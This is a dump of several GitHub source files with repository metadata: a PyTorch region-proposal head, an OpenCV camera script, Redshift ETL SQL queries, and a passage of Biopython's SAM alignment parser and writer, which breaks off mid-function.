| blob_id (stringlengths 40-40) | directory_id (stringlengths 40-40) | path (stringlengths 2-616) | content_id (stringlengths 40-40) | detected_licenses (listlengths 0-69) | license_type (stringclasses 2) | repo_name (stringlengths 5-118) | snapshot_id (stringlengths 40-40) | revision_id (stringlengths 40-40) | branch_name (stringlengths 4-63) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64 2.91k-686M, nullable) | star_events_count (int64 0-209k) | fork_events_count (int64 0-110k) | gha_license_id (stringclasses 23) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (stringclasses 213) | src_encoding (stringclasses 30) | language (stringclasses 1) | is_vendor (bool) | is_generated (bool) | length_bytes (int64 2-10.3M) | extension (stringclasses 246) | content (stringlengths 2-10.3M) | authors (listlengths 1-1) | author_id (stringlengths 0-212) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
44c52c00ce7f7050f6e5be57b23b40089305b112
|
662c9b1dd64fc87a17e62ccab8a1b3b3f58604e8
|
/Reference Code/lib/modeling/rpn_heads_panet.py
|
8e36ec0d7637b94bb760f8316be5600438387de1
|
[
"MIT"
] |
permissive
|
lixiang95/Amodal-Instance-Segmentation-through-KINS-Dataset
|
004daf92dc5a16ff0902b19102dec8d7299a1884
|
052a548c585ddc60ff5188cfe2345343903daf73
|
refs/heads/master
| 2022-04-05T02:43:25.683524
| 2020-02-16T12:09:42
| 2020-02-16T12:09:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,531
|
py
|
import torch
from torch import nn
from torch.nn import init
import torch.nn.functional as F
from core.config import cfg
from modeling.generate_anchors import generate_anchors
from modeling.generate_proposals import GenerateProposalsOp
from modeling.generate_proposal_labels import GenerateProposalLabelsOp
import modeling.FPN_PANET1_v2_2_v1 as FPN
import utils.net as net_utils
# ---------------------------------------------------------------------------- #
# RPN and Faster R-CNN outputs and losses
# ---------------------------------------------------------------------------- #
def generic_rpn_outputs(dim_in, spatial_scale_in):
"""Add RPN outputs (objectness classification and bounding box regression)
to an RPN model. Abstracts away the use of FPN.
"""
if cfg.FPN.FPN_ON:
# Delegate to the FPN module
return FPN.fpn_rpn_outputs(dim_in, spatial_scale_in)
else:
# Not using FPN, add RPN to a single scale
return single_scale_rpn_outputs(dim_in, spatial_scale_in)
def generic_rpn_losses(*inputs, **kwargs):
"""Add RPN losses. Abstracts away the use of FPN."""
if cfg.FPN.FPN_ON:
return FPN.fpn_rpn_losses(*inputs, **kwargs)
else:
return single_scale_rpn_losses(*inputs, **kwargs)
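# A minimal usage sketch (hypothetical feature dims; cfg values come from the
# loaded config, and single_scale_rpn_losses below lists the full label
# arguments abbreviated here as *rpn_label_blobs):
#   rpn = generic_rpn_outputs(dim_in=1024, spatial_scale_in=1. / 16)
#   out = rpn(feature_map, im_info, roidb)
#   loss_cls, loss_bbox = generic_rpn_losses(
#       out['rpn_cls_logits'], out['rpn_bbox_pred'], *rpn_label_blobs)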
class single_scale_rpn_outputs(nn.Module):
"""Add RPN outputs to a single scale model (i.e., no FPN)."""
def __init__(self, dim_in, spatial_scale):
super().__init__()
self.dim_in = dim_in
self.dim_out = dim_in if cfg.RPN.OUT_DIM_AS_IN_DIM else cfg.RPN.OUT_DIM
anchors = generate_anchors(
stride=1. / spatial_scale,
sizes=cfg.RPN.SIZES,
aspect_ratios=cfg.RPN.ASPECT_RATIOS)
num_anchors = anchors.shape[0]
# RPN hidden representation
self.RPN_conv = nn.Conv2d(self.dim_in, self.dim_out, 3, 1, 1)
# Proposal classification scores
self.n_score_out = num_anchors * 2 if cfg.RPN.CLS_ACTIVATION == 'softmax' \
else num_anchors
self.RPN_cls_score = nn.Conv2d(self.dim_out, self.n_score_out, 1, 1, 0)
# Proposal bbox regression deltas
self.RPN_bbox_pred = nn.Conv2d(self.dim_out, num_anchors * 4, 1, 1, 0)
self.RPN_GenerateProposals = GenerateProposalsOp(anchors, spatial_scale)
self.RPN_GenerateProposalLabels = GenerateProposalLabelsOp()
self._init_weights()
def _init_weights(self):
init.normal_(self.RPN_conv.weight, std=0.01)
init.constant_(self.RPN_conv.bias, 0)
init.normal_(self.RPN_cls_score.weight, std=0.01)
init.constant_(self.RPN_cls_score.bias, 0)
init.normal_(self.RPN_bbox_pred.weight, std=0.01)
init.constant_(self.RPN_bbox_pred.bias, 0)
def detectron_weight_mapping(self):
detectron_weight_mapping = {
'RPN_conv.weight': 'conv_rpn_w',
'RPN_conv.bias': 'conv_rpn_b',
'RPN_cls_score.weight': 'rpn_cls_logits_w',
'RPN_cls_score.bias': 'rpn_cls_logits_b',
'RPN_bbox_pred.weight': 'rpn_bbox_pred_w',
'RPN_bbox_pred.bias': 'rpn_bbox_pred_b'
}
orphan_in_detectron = []
return detectron_weight_mapping, orphan_in_detectron
def forward(self, x, im_info, roidb=None):
"""
x: feature maps from the backbone network. (Variable)
im_info: (CPU Variable)
roidb: (list of ndarray)
"""
rpn_conv = F.relu(self.RPN_conv(x), inplace=True)
rpn_cls_logits = self.RPN_cls_score(rpn_conv)
rpn_bbox_pred = self.RPN_bbox_pred(rpn_conv)
return_dict = {
'rpn_cls_logits': rpn_cls_logits, 'rpn_bbox_pred': rpn_bbox_pred}
if not self.training or cfg.MODEL.FASTER_RCNN:
# Proposals are needed during:
# 1) inference (== not model.train) for RPN only and Faster R-CNN
# OR
# 2) training for Faster R-CNN
# Otherwise (== training for RPN only), proposals are not needed
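            # With softmax activation, the C = 2*A channel axis is viewed as
            # (2, A) so that dim=1 holds each anchor's background/foreground
            # pair; the foreground slice [:, 1] has shape (B, A, H, W).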
if cfg.RPN.CLS_ACTIVATION == 'softmax':
B, C, H, W = rpn_cls_logits.size()
rpn_cls_prob = F.softmax(
rpn_cls_logits.view(B, 2, C // 2, H, W), dim=1)
rpn_cls_prob = rpn_cls_prob[:, 1].squeeze(dim=1)
else:
                rpn_cls_prob = torch.sigmoid(rpn_cls_logits)
rpn_rois, rpn_rois_prob = self.RPN_GenerateProposals(
rpn_cls_prob, rpn_bbox_pred, im_info)
return_dict['rpn_rois'] = rpn_rois
return_dict['rpn_roi_probs'] = rpn_rois_prob
            if cfg.MODEL.FASTER_RCNN:
if self.training:
# Add op that generates training labels for in-network RPN proposals
blobs_out = self.RPN_GenerateProposalLabels(rpn_rois, roidb, im_info)
return_dict.update(blobs_out)
else:
# Alias rois to rpn_rois for inference
return_dict['rois'] = return_dict['rpn_rois']
return return_dict
def single_scale_rpn_losses(
rpn_cls_logits, rpn_bbox_pred,
rpn_labels_int32_wide, rpn_bbox_targets_wide,
rpn_bbox_inside_weights_wide, rpn_bbox_outside_weights_wide):
"""Add losses for a single scale RPN model (i.e., no FPN)."""
h, w = rpn_cls_logits.shape[2:]
rpn_labels_int32 = rpn_labels_int32_wide[:, :, :h, :w] # -1 means ignore
h, w = rpn_bbox_pred.shape[2:]
rpn_bbox_targets = rpn_bbox_targets_wide[:, :, :h, :w]
rpn_bbox_inside_weights = rpn_bbox_inside_weights_wide[:, :, :h, :w]
rpn_bbox_outside_weights = rpn_bbox_outside_weights_wide[:, :, :h, :w]
if cfg.RPN.CLS_ACTIVATION == 'softmax':
B, C, H, W = rpn_cls_logits.size()
rpn_cls_logits = rpn_cls_logits.view(
B, 2, C // 2, H, W).permute(0, 2, 3, 4, 1).contiguous().view(-1, 2)
rpn_labels_int32 = rpn_labels_int32.contiguous().view(-1).long()
# the loss is averaged over non-ignored targets
loss_rpn_cls = F.cross_entropy(
rpn_cls_logits, rpn_labels_int32, ignore_index=-1)
else:
        weight = (rpn_labels_int32 >= 0).float()
        loss_rpn_cls = F.binary_cross_entropy_with_logits(
            rpn_cls_logits, rpn_labels_int32.float(), weight, reduction='sum')
        loss_rpn_cls /= weight.sum()
loss_rpn_bbox = net_utils.smooth_l1_loss(
rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights, rpn_bbox_outside_weights,
beta=1/9)
return loss_rpn_cls, loss_rpn_bbox
|
[
"qqlu1992@gmail.com"
] |
qqlu1992@gmail.com
|
575f16350068085904d3e88d041788aa5d2ad0bc
|
c6b46e402eea7769dd5c7e5232e677976ddd7482
|
/main.py
|
9b7acb37f2a0ee60bbe8a8e955537c68e2642ddb
|
[
"MIT"
] |
permissive
|
alhazmy13/ResistorsOpenCV
|
cbdab3b2c3c9736452e7a97f0f2c16e3b630a39d
|
95237e6014ef51a4a2eb3f049f9844f535090ecf
|
refs/heads/master
| 2023-02-14T02:24:55.266688
| 2020-10-25T12:16:52
| 2020-10-25T12:16:52
| 307,081,563
| 3
| 0
| null | 2020-10-25T12:04:24
| 2020-10-25T11:14:44
|
Python
|
UTF-8
|
Python
| false
| false
| 305
|
py
|
import cv2
from vision import Vision
vision = Vision()
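# Poll the camera until 'q' is pressed: cv2.waitKey(1) pumps the HighGUI event
# loop once per frame and returns the code of any pressed key (or -1).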
if __name__ == "__main__":
    while cv2.waitKey(1) != ord('q'):
_, live_img = vision.get_camera()
vision.print_result(live_img=live_img)
cv2.imshow("Frame", live_img)
vision.release()
cv2.destroyAllWindows()
|
[
"me@alhazmy13.net"
] |
me@alhazmy13.net
|
ab1ae3d0b32da3e9f20bd3fb9d1b81d217bd46eb
|
02d0b4180184eb5598b3f9c7d2c34540562e74ea
|
/ND03 - Data Warehouse/sql_queries.py
|
07cf68f9a46e83fc8bf42ff754f8ffebd3afe15c
|
[] |
no_license
|
sketha33/Udacity_DE_NanoDegree
|
8d6e0438686cd61c925c39f13c74257ea6bd9edc
|
b0d310821a4ea98afd1c7b5ca9f06b0cc1ca2c5f
|
refs/heads/main
| 2022-12-29T19:42:33.974834
| 2020-10-18T20:22:23
| 2020-10-18T20:22:23
| 303,818,151
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,499
|
py
|
import configparser
# CONFIG
config = configparser.ConfigParser()
config.read('dwh.cfg')
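# A sketch of the dwh.cfg layout this module expects (section and key names
# are taken from the config.get() calls below; values are placeholders):
#
#   [IAM_ROLE]
#   ARN = 'arn:aws:iam::<account-id>:role/<redshift-role>'
#
#   [S3]
#   LOG_DATA = 's3://<bucket>/log_data'
#   LOG_JSONPATH = 's3://<bucket>/log_json_path.json'
#   SONG_DATA = 's3://<bucket>/song_data'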
# Truncate TABLES
staging_events_table_trun = "TRUNCATE TABLE staging_events"
staging_songs_table_trun = "TRUNCATE TABLE staging_songs"
songplay_table_trun = "TRUNCATE TABLE songplay"
user_table_trun = "TRUNCATE TABLE users"
song_table_trun = "TRUNCATE TABLE songs"
artist_table_trun = "TRUNCATE TABLE artists"
time_table_trun = "TRUNCATE TABLE time"
# DROP TABLES
staging_events_table_drop = "DROP TABLE staging_events"
staging_songs_table_drop = "DROP TABLE staging_songs"
songplay_table_drop = "DROP TABLE songplay"
user_table_drop = "DROP TABLE users"
song_table_drop = "DROP TABLE songs"
artist_table_drop = "DROP TABLE artists"
time_table_drop = "DROP TABLE time"
# CREATE TABLES
staging_events_table_create = (""" CREATE TABLE IF NOT EXISTS staging_events ( artist VARCHAR, \
auth VARCHAR, \
firstName VARCHAR, \
gender VARCHAR, \
itemInSession VARCHAR, \
lastName VARCHAR, \
length FLOAT, \
level VARCHAR, \
location VARCHAR, \
method VARCHAR, \
page VARCHAR, \
registration VARCHAR, \
sessionId VARCHAR, \
song VARCHAR, \
status VARCHAR, \
ts VARCHAR, \
userAgent VARCHAR, \
userId VARCHAR ); """)
staging_songs_table_create = (""" CREATE TABLE IF NOT EXISTS staging_songs (num_songs INTEGER, \
artist_id VARCHAR, \
artist_latitude VARCHAR, \
artist_longitude VARCHAR, \
artist_location VARCHAR, \
artist_name VARCHAR, \
song_id VARCHAR, \
title VARCHAR, \
duration FLOAT, \
year INTEGER); """)
songplay_table_create = (""" CREATE TABLE IF NOT EXISTS songplay (songplay_id INTEGER IDENTITY(0,1) NOT NULL PRIMARY KEY, \
                                                            start_time TIMESTAMP, \
user_id VARCHAR NOT NULL, \
level VARCHAR, \
song_id VARCHAR NOT NULL, \
artist_id VARCHAR NOT NULL, \
session_id VARCHAR, \
location VARCHAR, \
user_agent VARCHAR); """)
user_table_create = (""" CREATE TABLE IF NOT EXISTS users (user_id VARCHAR NOT NULL PRIMARY KEY, \
first_name VARCHAR, \
last_name VARCHAR, \
gender VARCHAR, \
level VARCHAR); """)
song_table_create = (""" CREATE TABLE IF NOT EXISTS songs (song_id VARCHAR NOT NULL PRIMARY KEY, \
title VARCHAR, \
artist_id VARCHAR NOT NULL, \
                                                              year INTEGER, \
                                                              duration FLOAT ); """)
artist_table_create = (""" CREATE TABLE IF NOT EXISTS artists (artist_id VARCHAR NOT NULL PRIMARY KEY, \
name VARCHAR, \
location VARCHAR, \
latitude VARCHAR, \
longitude VARCHAR) ; """)
time_table_create = (""" CREATE TABLE IF NOT EXISTS time (start_time TIMESTAMP NOT NULL PRIMARY KEY , \
hour VARCHAR, \
day VARCHAR, \
week VARCHAR, \
month VARCHAR, \
year VARCHAR, \
weekday VARCHAR); """)
# STAGING TABLES
staging_events_copy = (""" copy staging_events from {} \
credentials 'aws_iam_role={}'\
json {} \
region 'us-west-2';""").format(config.get("S3", "LOG_DATA"), config.get("IAM_ROLE", "ARN"),config.get("S3", "LOG_JSONPATH"))
staging_songs_copy = (""" copy staging_songs from {} \
credentials 'aws_iam_role={}' \
json 'auto' \
region 'us-west-2';""").format(config.get("S3", "SONG_DATA"), config.get("IAM_ROLE", "ARN"))
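# The COPY commands bulk-load the staging tables straight from S3: the event
# data uses the JSONPaths file in LOG_JSONPATH to map its columns, while the
# song data relies on the json 'auto' field matching.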
# Final Tables
songplay_table_insert = (""" INSERT INTO songplay (start_time, \
user_id, \
level, \
song_id, \
artist_id, \
session_id, \
location, \
user_agent) \
(SELECT DISTINCT TIMESTAMP 'epoch' + ts/1000 *INTERVAL '1 second', \
userId, \
level, \
song_id, \
artist_id, \
sessionId, \
location, \
useragent \
FROM staging_songs, staging_events \
WHERE title = song \
AND artist = artist_name
AND page = 'NextSong' ) """)
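# The staging ts column stores Unix epoch milliseconds as text; the expression
# TIMESTAMP 'epoch' + ts/1000 * INTERVAL '1 second' above converts it, e.g.
# ts = 1541105830796 -> 1541105830.796 seconds after 1970-01-01 00:00:00.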
user_table_insert = (""" INSERT INTO users (user_id, \
first_name, \
last_name, \
gender, \
level) \
(SELECT DISTINCT userId, \
firstName, \
lastname, \
gender, \
level \
FROM staging_events
WHERE page = 'NextSong') """)
song_table_insert = (""" INSERT INTO songs(song_id, \
title, \
artist_id, \
year, \
duration) \
(SELECT DISTINCT song_id, \
title, \
artist_id, \
year, \
duration \
FROM staging_songs) """)
artist_table_insert = (""" INSERT INTO artists (artist_id, \
name, \
location, \
latitude, \
longitude ) \
(SELECT DISTINCT artist_id, \
artist_name, \
artist_location, \
artist_latitude, \
artist_longitude \
FROM staging_songs )
""")
time_table_insert = (""" INSERT INTO time (start_time,hour,day,week,month,year,weekday) \
                                          ( SELECT DISTINCT start_time, \
EXTRACT(hour FROM start_time) AS hour, \
EXTRACT(day FROM start_time) AS day, \
EXTRACT(week FROM start_time) AS week, \
EXTRACT(month FROM start_time) AS month, \
EXTRACT(year FROM start_time) AS year, \
EXTRACT(dayofweek FROM start_time) as weekday \
FROM songplay);
""")
# QUERY LISTS
create_table_queries = [staging_events_table_create, \
staging_songs_table_create, \
songplay_table_create, \
user_table_create, \
song_table_create, \
artist_table_create, \
time_table_create]
drop_table_queries = [staging_events_table_drop, \
staging_songs_table_drop, \
songplay_table_drop, \
user_table_drop, \
song_table_drop, \
artist_table_drop, \
time_table_drop]
copy_table_queries = [staging_events_copy, \
staging_songs_copy]
insert_table_queries = [songplay_table_insert, \
user_table_insert, \
song_table_insert, \
artist_table_insert, \
time_table_insert]
trunc_table_queries = [staging_events_table_trun, \
staging_songs_table_trun, \
songplay_table_trun, \
user_table_trun, \
song_table_trun, \
artist_table_trun, \
time_table_trun]
|
[
"noreply@github.com"
] |
sketha33.noreply@github.com
|
05da5fd12fbafb2386db3b2f9980d4c9d9063e02
|
5d34689e0fe3dea453416bd7849b8028e1a0b3e4
|
/Bio/Align/sam.py
|
522ded168bad2599cfc7bd7e1c5d2cc887ca7f9c
|
[
"BSD-3-Clause",
"LicenseRef-scancode-biopython"
] |
permissive
|
fabianegli/biopython
|
2996d4209933b15e42db7e95f4a36d84a4df0ebd
|
06a96c0311ec7a8b714adff9f8b6d3414ecc70a0
|
refs/heads/master
| 2022-09-04T15:33:07.733522
| 2022-08-09T10:18:45
| 2022-08-09T10:18:45
| 167,009,089
| 0
| 0
|
NOASSERTION
| 2022-06-15T13:27:43
| 2019-01-22T14:34:52
|
Python
|
UTF-8
|
Python
| false
| false
| 30,190
|
py
|
# Copyright 2022 by Michiel de Hoon. All rights reserved.
#
# This file is part of the Biopython distribution and governed by your
# choice of the "Biopython License Agreement" or the "BSD 3-Clause License".
# Please see the LICENSE file that should have been included as part of this
# package.
"""Bio.Align support for the "sam" pairwise alignment format.
The Sequence Alignment/Map (SAM) format, created by Heng Li and Richard Durbin
at the Wellcome Trust Sanger Institute, stores a series of alignments to the
genome in a single file. Typically they are used for next-generation sequencing
data. SAM files store the alignment positions for mapped sequences, and may
also store the aligned sequences and other information associated with the
sequence.
See http://www.htslib.org/ for more information.
You are expected to use this module via the Bio.Align functions.
Coordinates in the SAM format are defined in terms of one-based start
positions; the parser converts these to zero-based coordinates to be consistent
with Python and other alignment formats.
"""
from itertools import chain
import copy
try:
import numpy
except ImportError:
from Bio import MissingPythonDependencyError
raise MissingPythonDependencyError(
"Please install numpy if you want to use Bio.Align. "
"See http://www.numpy.org/"
) from None
from Bio.Align import Alignment
from Bio.Align import interfaces
from Bio.Seq import Seq, reverse_complement, UndefinedSequenceError
from Bio.SeqRecord import SeqRecord
from Bio import BiopythonExperimentalWarning
import warnings
warnings.warn(
"Bio.Align.sam is an experimental module which may undergo "
"significant changes prior to its future official release.",
BiopythonExperimentalWarning,
)
class AlignmentWriter(interfaces.AlignmentWriter):
"""Alignment file writer for the Sequence Alignment/Map (SAM) file format."""
def __init__(self, target, md=False):
"""Create an AlignmentWriter object.
Arguments:
- md - If True, calculate the MD tag from the alignment and include it
in the output.
If False (default), do not include the MD tag in the output.
"""
super().__init__(target, mode="w")
self.md = md
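        # For reference, an MD value such as "10A5^AC6" encodes: ten matching
        # bases, a mismatch where the reference has "A", five matches, a
        # deletion of "AC" from the reference, then six more matches.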
def write_header(self, alignments):
"""Write the SAM header."""
try:
metadata = alignments.metadata
except AttributeError:
metadata = {}
try:
targets = alignments.targets
except AttributeError:
targets = {}
values = metadata.get("HD")
if values is not None:
# if HD is present, then VN is required and must come first
fields = ["@HD", "VN:%s" % values["VN"]]
for key, value in values.items():
if key == "VN":
continue
fields.append("%s:%s" % (key, value))
line = "\t".join(fields) + "\n"
self.stream.write(line)
for rname, record in targets.items():
assert rname == record.id
fields = ["@SQ"]
fields.append("SN:%s" % rname)
length = len(record.seq)
fields.append("LN:%d" % length)
for key, value in record.annotations.items():
if key == "alternate_locus":
fields.append("AH:%s" % value)
elif key == "names":
fields.append("AN:%s" % ",".join(value))
elif key == "assembly":
fields.append("AS:%s" % value)
elif key == "MD5":
fields.append("M5:%s" % value)
elif key == "species":
fields.append("SP:%s" % value)
elif key == "topology":
assert value in ("linear", "circular")
fields.append("PP:%s" % value)
elif key == "URI":
fields.append("UR:%s" % value)
else:
fields.append("%s:%s" % (key[:2], value))
try:
description = record.description
except AttributeError:
pass
else:
if description != "<unknown description>":
fields.append("DS:%s" % description)
line = "\t".join(fields) + "\n"
self.stream.write(line)
for tag, rows in metadata.items():
if tag == "HD": # already written
continue
for row in rows:
fields = ["@" + tag]
for key, value in row.items():
fields.append("%s:%s" % (key, value))
line = "\t".join(fields) + "\n"
self.stream.write(line)
def format_alignment(self, alignment, md=None):
"""Return a string with a single alignment formatted as one SAM line."""
if not isinstance(alignment, Alignment):
raise TypeError("Expected an Alignment object")
coordinates = alignment.coordinates.transpose()
target, query = alignment.sequences
hard_clip_left = None
hard_clip_right = None
try:
qName = query.id
except AttributeError:
qName = "query"
qual = "*"
else:
try:
hard_clip_left = query.annotations["hard_clip_left"]
except (AttributeError, KeyError):
pass
try:
hard_clip_right = query.annotations["hard_clip_right"]
except (AttributeError, KeyError):
pass
try:
qual = query.letter_annotations["phred_quality"]
except (AttributeError, KeyError):
qual = "*"
query = query.seq
qSize = len(query)
try:
rName = target.id
except AttributeError:
rName = "target"
else:
target = target.seq
tSize = len(target)
if coordinates[0, 1] < coordinates[-1, 1]: # mapped to forward strand
flag = 0
else: # mapped to reverse strand
flag = 16
query = reverse_complement(query, inplace=False)
coordinates = numpy.array(coordinates)
coordinates[:, 1] = qSize - coordinates[:, 1]
hard_clip_left, hard_clip_right = hard_clip_right, hard_clip_left
try:
query = bytes(query)
except TypeError: # string
pass
except UndefinedSequenceError:
query = "*"
else:
query = str(query, "ASCII")
tStart, qStart = coordinates[0, :]
pos = tStart
cigar = ""
if hard_clip_left is not None:
cigar += "%dH" % hard_clip_left
if qStart > 0:
cigar += "%dS" % qStart
try:
operations = alignment.operations
except AttributeError:
operations = None
for tEnd, qEnd in coordinates[1:, :]:
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
cigar += "%dI" % qCount # insertion to the reference
qStart = qEnd
elif qCount == 0:
cigar += "%dD" % tCount # deletion from the reference
tStart = tEnd
else:
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
cigar += "%dM" % tCount
tStart = tEnd
qStart = qEnd
else:
for operation, (tEnd, qEnd) in zip(operations, coordinates[1:, :]):
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
assert operation == ord("I")
cigar += "%dI" % qCount # insertion to the reference
qStart = qEnd
elif qCount == 0:
if operation == ord("N"):
cigar += "%dN" % tCount # skipped region from the reference
elif operation == ord("D"):
cigar += "%dD" % tCount # deletion from the reference
else:
raise ValueError(f"Unexpected operation {operation}")
tStart = tEnd
else:
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
assert operation == ord("M")
cigar += "%dM" % tCount
tStart = tEnd
qStart = qEnd
if qEnd < qSize:
cigar += "%dS" % (qSize - qEnd)
if hard_clip_right is not None:
cigar += "%dH" % hard_clip_right
try:
mapq = alignment.mapq
except AttributeError:
mapq = 255 # not available
rNext = "*"
pNext = 0
tLen = 0
fields = [
qName,
str(flag),
rName,
str(pos + 1), # 1-based coordinates
str(mapq),
cigar,
rNext,
str(pNext),
str(tLen),
query,
qual,
]
if md is None:
md = self.md
if md is True:
if query == "*":
raise ValueError("requested MD tag with undefined sequence")
# calculate the MD tag from the alignment coordinates and sequences
tStart, qStart = coordinates[0, :]
number = 0
md = ""
if operations is None:
for tEnd, qEnd in coordinates[1:, :]:
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
# insertion to the reference
qStart = qEnd
                    elif qCount == 0:
                        length = tCount
                        # deletion from the reference
                        if number:
                            md += str(number)
                            number = 0
                        md += "^" + target[tStart:tEnd]
                        tStart = tEnd
else:
# alignment match
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
for tc, qc in zip(target[tStart:tEnd], query[qStart:qEnd]):
if tc == qc:
number += 1
else:
md += str(number) + tc
number = 0
tStart = tEnd
qStart = qEnd
if number:
md += str(number)
else:
for operation, (tEnd, qEnd) in zip(operations, coordinates[1:, :]):
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
# insertion to the reference
qStart = qEnd
elif qCount == 0:
length = tCount
if operation != ord("N"):
# deletion from the reference
if number:
md += str(number)
number = 0
md += "^" + target[tStart:tEnd]
tStart = tEnd
else:
# alignment match
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
for tc, qc in zip(target[tStart:tEnd], query[qStart:qEnd]):
if tc == qc:
number += 1
else:
md += str(number) + tc
number = 0
tStart = tEnd
qStart = qEnd
if number:
md += str(number)
field = "MD:Z:%s" % md
fields.append(field)
try:
score = alignment.score
except AttributeError:
pass
else:
field = "AS:i:%d" % int(round(score))
fields.append(field)
try:
annotations = alignment.annotations
except AttributeError:
pass
else:
for key, value in annotations.items():
if isinstance(value, int):
datatype = "i"
value = str(value)
elif isinstance(value, float):
datatype = "f"
value = str(value)
elif isinstance(value, str):
if len(value) == 1:
datatype = "A"
else:
datatype = "Z"
                elif isinstance(value, bytes):
                    datatype = "H"
                    # H-type values are hex strings, two digits per byte
                    value = "".join("%02X" % b for b in value)
                elif isinstance(value, numpy.ndarray):
                    datatype = "B"
                    if numpy.issubdtype(value.dtype, numpy.integer):
                        letter = "i"
                    elif numpy.issubdtype(value.dtype, numpy.floating):
                        letter = "f"
                    else:
                        raise ValueError(
                            f"Array of incompatible data type {value.dtype} in annotation '{key}'"
                        )
                    # B-type values carry their subtype letter as a prefix
                    value = letter + "," + ",".join(map(str, value))
field = f"{key}:{datatype}:{value}"
fields.append(field)
line = "\t".join(fields) + "\n"
return line
class AlignmentIterator(interfaces.AlignmentIterator):
"""Alignment iterator for Sequence Alignment/Map (SAM) files.
Each line in the file contains one genomic alignment, which are loaded
and returned incrementally. The following columns are stored as attributes
of the alignment:
- flag: The FLAG combination of bitwise flags;
- mapq: Mapping Quality (only stored if available)
- rnext: Reference sequence name of the primary alignment of the next read
in the alignment (only stored if available)
- pnext: Zero-based position of the primary alignment of the next read in
the template (only stored if available)
- tlen: signed observed template length (only stored if available)
Other information associated with the alignment by its tags are stored in
the annotations attribute of each alignment.
Any hard clipping (clipped sequences not present in the query sequence)
are stored as 'hard_clip_left' and 'hard_clip_right' in the annotations
dictionary attribute of the query sequence record.
The sequence quality, if available, is stored as 'phred_quality' in the
letter_annotations dictionary attribute of the query sequence record.
"""
def __init__(self, source):
"""Create an AlignmentIterator object.
Arguments:
- source - input data or file name
"""
super().__init__(source, mode="t", fmt="SAM")
def _read_header(self, stream):
self.metadata = {}
self.targets = {}
for line in stream:
if not line.startswith("@"):
self._line = line
break
fields = line[1:].strip().split("\t")
tag = fields[0]
values = {}
if tag == "SQ":
annotations = {}
description = None
for field in fields[1:]:
key, value = field.split(":", 1)
assert len(key) == 2
if key == "SN":
rname = value
elif key == "LN":
length = int(value)
elif key == "AH":
annotations["alternate_locus"] = value
elif key == "AN":
annotations["names"] = value.split(",")
elif key == "AS":
annotations["assembly"] = value
elif key == "DS":
description = value
elif key == "M5":
annotations["MD5"] = value
elif key == "SP":
annotations["species"] = value
elif key == "TP":
assert value in ("linear", "circular")
annotations["topology"] = value
elif key == "UR":
annotations["URI"] = value
else:
annotations[key] = value
assert rname not in self.targets
sequence = Seq(None, length=length)
record = SeqRecord(sequence, id=rname, annotations=annotations)
if description is not None:
record.description = description
self.targets[rname] = record
else:
for field in fields[1:]:
key, value = field.split(":", 1)
assert len(key) == 2
values[key] = value
if tag == "HD":
self.metadata[tag] = values
else:
if tag not in self.metadata:
self.metadata[tag] = []
self.metadata[tag].append(values)
def _read_next_alignment(self, stream):
try:
line = self._line
except AttributeError:
lines = stream
else:
lines = chain([line], stream)
del self._line
for line in lines:
fields = line.split()
if len(fields) < 11:
raise ValueError(
"line has %d columns; expected at least 11" % len(fields)
)
qname = fields[0]
flag = int(fields[1])
rname = fields[2]
target_pos = int(fields[3]) - 1
mapq = int(fields[4])
cigar = fields[5]
rnext = fields[6]
pnext = int(fields[7]) - 1
tlen = int(fields[8])
query = fields[9]
qual = fields[10]
md = None
score = None
annotations = {}
column_annotations = {}
for field in fields[11:]:
tag, datatype, value = field.split(":", 2)
if tag == "AS":
assert datatype == "i"
score = int(value)
elif tag == "MD":
assert datatype == "Z"
md = value
else:
if datatype == "i":
value = int(value)
elif datatype == "f":
value = float(value)
elif datatype in ("A", "Z"): # string
pass
elif datatype == "H":
n = len(value)
                        value = bytes(int(value[i : i + 2], 16) for i in range(0, n, 2))
elif datatype == "B":
letter = value[0]
value = value[1:].split(",")
if letter in "cCsSiI":
dtype = int
elif letter == "f":
dtype = float
else:
raise ValueError(
f"Unknown number type '{letter}' in tag '{field}'"
)
value = numpy.array(value, dtype)
annotations[tag] = value
if flag & 0x10:
strand = "-"
else:
strand = "+"
hard_clip_left = None
hard_clip_right = None
store_operations = False
if flag & 0x4: # unmapped
target = None
coordinates = None
elif md is None:
query_pos = 0
coordinates = [[target_pos, query_pos]]
number = ""
operations = bytearray()
for letter in cigar:
if letter == "M":
# M: alignment match
length = int(number)
target_pos += length
query_pos += length
elif letter in "=X":
# =: sequence match
# X: sequence mismatch
length = int(number)
target_pos += length
query_pos += length
store_operations = True
elif letter == "I":
# I: insertion to the reference
length = int(number)
query_pos += length
elif letter == "S":
# S: soft clipping
length = int(number)
if query_pos == 0:
coordinates[0][1] += length
query_pos += length
number = ""
continue
elif letter == "D":
# D: deletion from the reference
length = int(number)
target_pos += length
elif letter == "N":
# N: skipped region from the reference
length = int(number)
target_pos += length
store_operations = True
elif letter == "H": # hard clipping
if query_pos == 0:
hard_clip_left = int(number)
else:
hard_clip_right = int(number)
number = ""
continue
elif letter == "P": # padding
raise NotImplementedError(
"padding operator is not yet implemented"
)
else:
number += letter
continue
coordinates.append([target_pos, query_pos])
operations.append(ord(letter))
number = ""
target = self.targets.get(rname)
if target is None:
if self.targets:
raise ValueError(f"Found target {rname} missing from header")
target = SeqRecord(None, id=rname)
else:
query_pos = 0
coordinates = [[target_pos, query_pos]]
seq = query
target = ""
starts = [target_pos]
size = 0
sizes = []
number = ""
operations = bytearray()
for letter in cigar:
if letter in "M":
# M: alignment match
length = int(number)
target_pos += length
query_pos += length
target += seq[:length]
seq = seq[length:]
size += length
elif letter in "=X":
# =: sequence match
# X: sequence mismatch
length = int(number)
target_pos += length
query_pos += length
